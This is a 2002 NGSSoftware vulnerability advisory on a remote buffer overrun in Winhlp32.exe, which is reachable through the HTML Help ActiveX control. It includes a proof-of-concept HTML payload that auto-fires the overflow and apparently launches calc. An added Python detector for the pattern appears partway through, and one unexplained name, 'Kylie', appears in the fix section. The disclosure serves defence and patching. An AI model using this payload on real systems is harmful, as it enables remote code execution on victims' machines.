Winhlp32.exe Remote BufferOverrun

From: Next Generation Insight Security Research Team (mark@NGSSOFTWARE.COM)
Date: 08/02/02


Date:         Thu, 1 Aug 2002 19:41:08 -0700
From: Next Generation Insight Security Research Team <mark@NGSSOFTWARE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

NGSSoftware Insight Security Research Advisory

Name: Winhlp32.exe Remote BufferOverrun
Systems Affected: Win2K Platform
Severity: Critical
Category: Remote Buffer Overrun
Vendor URL: http://www.microsoft.com
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 1st August 2002
Advisory number: #NISR01082002

Description
***********

Many of the features available in HTML Help are implemented through the HTML
Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control is used to
provide navigation features (such as a table of contents), to display
secondary windows and pop-up definitions, and to provide other features. The
HTML Help ActiveX control can be used from topics in a compiled Help system
as well as from HTML pages displayed in a Web browser. The functionality
provided by the HTML Help ActiveX control will run in the HTML Help Viewer
or in any browser that supports ActiveX technology, such as Internet
Explorer (version 3.01 or later). Some features provided by the HTML Help
ActiveX control, such as the WinHlp command, are meant to be available only
when the control is used from a compiled HTML Help file (.chm) that is
displayed by the HTML Help Viewer.

Details
*******

Winhlp32.exe is vulnerable to a buffer overrun attack via the Item parameter
of the WinHlp command. The Item parameter specifies the file path of the
WinHelp (.hlp) file in which the WinHelp topic is stored, together with the
name of the target window. Using this overrun, an attacker can execute
arbitrary code on a remote system either by encouraging the victim to visit a
particular web page, where the code runs automatically, or by including the
exploit within the source of an email. In the email case, execution occurs
automatically as soon as the message appears in the preview pane, provided
ActiveX objects are allowed. They are allowed by default; the Internet
security settings would have to be set to High to prevent this vulnerability
from being triggered. Any exploit executes in the context of the logged-on
user.

Visual POC Exploit
******************

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM
NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM
NAME="Item1"
VALUE="3Phcalc4$&#402;&#1;PVw3P&#8221;wAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTT
AAAA&#11;wABCDEFGH&#402;&#21;gMyWindow"><PARAM NAME="Item2" VALUE="NGS
Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
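The Details section and the POC above describe the shape of the attack: an HHCtrl.ocx OBJECT tag issuing the WinHelp command with an overlong Item1 value, triggered from script via HHClick(). The following is an added detection example, not code from the advisory or from NGSSoftware; it scans HTML or mail bodies for that pattern. The CLSID comes from the POC; the length threshold, the parameter syntax of the benign sample and both sample documents are constructed assumptions for this example.

```python
import re
from html import unescape

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx), as used in the advisory's POC.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Assumed threshold: a legitimate Item1 (help file path plus window name) is short.
MAX_ITEM1_LEN = 260

OBJECT_RE = re.compile(r"<object\b([^>]*)>(.*?)</object>", re.I | re.S)
PARAM_RE = re.compile(
    r'<param\b[^>]*?name\s*=\s*["\']?(\w+)["\']?[^>]*?value\s*=\s*"([^"]*)"', re.I | re.S)
CLICK_RE = re.compile(r"\.HHClick\s*\(", re.I)  # script fires the control with no user click


def find_hhctrl_winhelp(doc: str) -> list:
    """Return one finding per HHCtrl <OBJECT> that issues the WinHelp command."""
    findings = []
    auto_click = bool(CLICK_RE.search(doc))
    for m in OBJECT_RE.finditer(doc):
        attrs, body = m.group(1), m.group(2)
        if HHCTRL_CLSID not in attrs.lower():
            continue
        # Decode entities so encoded characters (e.g. &#402;) count toward the real length.
        params = {n.lower(): unescape(v) for n, v in PARAM_RE.findall(body)}
        if params.get("command", "").strip().lower() != "winhelp":
            continue
        item1 = params.get("item1", "")
        findings.append({
            "item1_len": len(item1),
            "overlong": len(item1) > MAX_ITEM1_LEN,
            "non_ascii": any(ord(c) > 126 or ord(c) < 32 for c in item1),
            "auto_click": auto_click,
        })
    return findings


def is_suspicious(doc: str) -> bool:
    """True if any HHCtrl WinHelp call carries an overlong or binary-looking Item1."""
    return any(f["overlong"] or f["non_ascii"] for f in find_hhctrl_winhelp(doc))


# Constructed samples (not from the advisory): a benign call and an overrun-shaped one.
BENIGN_SAMPLE = ('<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 id=winhelp>'
                 '<PARAM NAME="Command" VALUE="WinHelp">'
                 '<PARAM NAME="Item1" VALUE="helpfile.hlp>mainwin"></OBJECT>')
OVERRUN_SAMPLE = ('<OBJECT classid=clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11 '
                  'codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp width=0>'
                  '<PARAM NAME="Width" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp">'
                  '<PARAM NAME="Item1"\nVALUE="calc&#402;' + "A" * 600 + 'MyWindow">'
                  '</OBJECT><SCRIPT>winhelp.HHClick()</SCRIPT>')
```

Run over a mail preview body or fetched page, a positive result from is_suspicious() is a reason to block or quarantine the content before the control is instantiated.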

Fix Information
***************

NGSSoftware alerted Microsoft to these problems on the 6th March 2002.
NGSSoftware highly recommends installing Microsoft Windows SP3, as the fix
has been built into this service pack, available from http://www.microsoft.com.
An alternative to the patch is to ensure that the security setting found in
Internet Options is set to High. Even at the Medium setting, which states
that unsigned ActiveX controls will not be downloaded, Kylie will still
execute Calc.exe. Another alternative is to remove winhlp32.exe if it is not
required within your environment.
A check for these issues has been added to Typhon II; more information is
available from the NGSSoftware website, http://www.ngssoftware.com.

Further Information
*******************

For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf
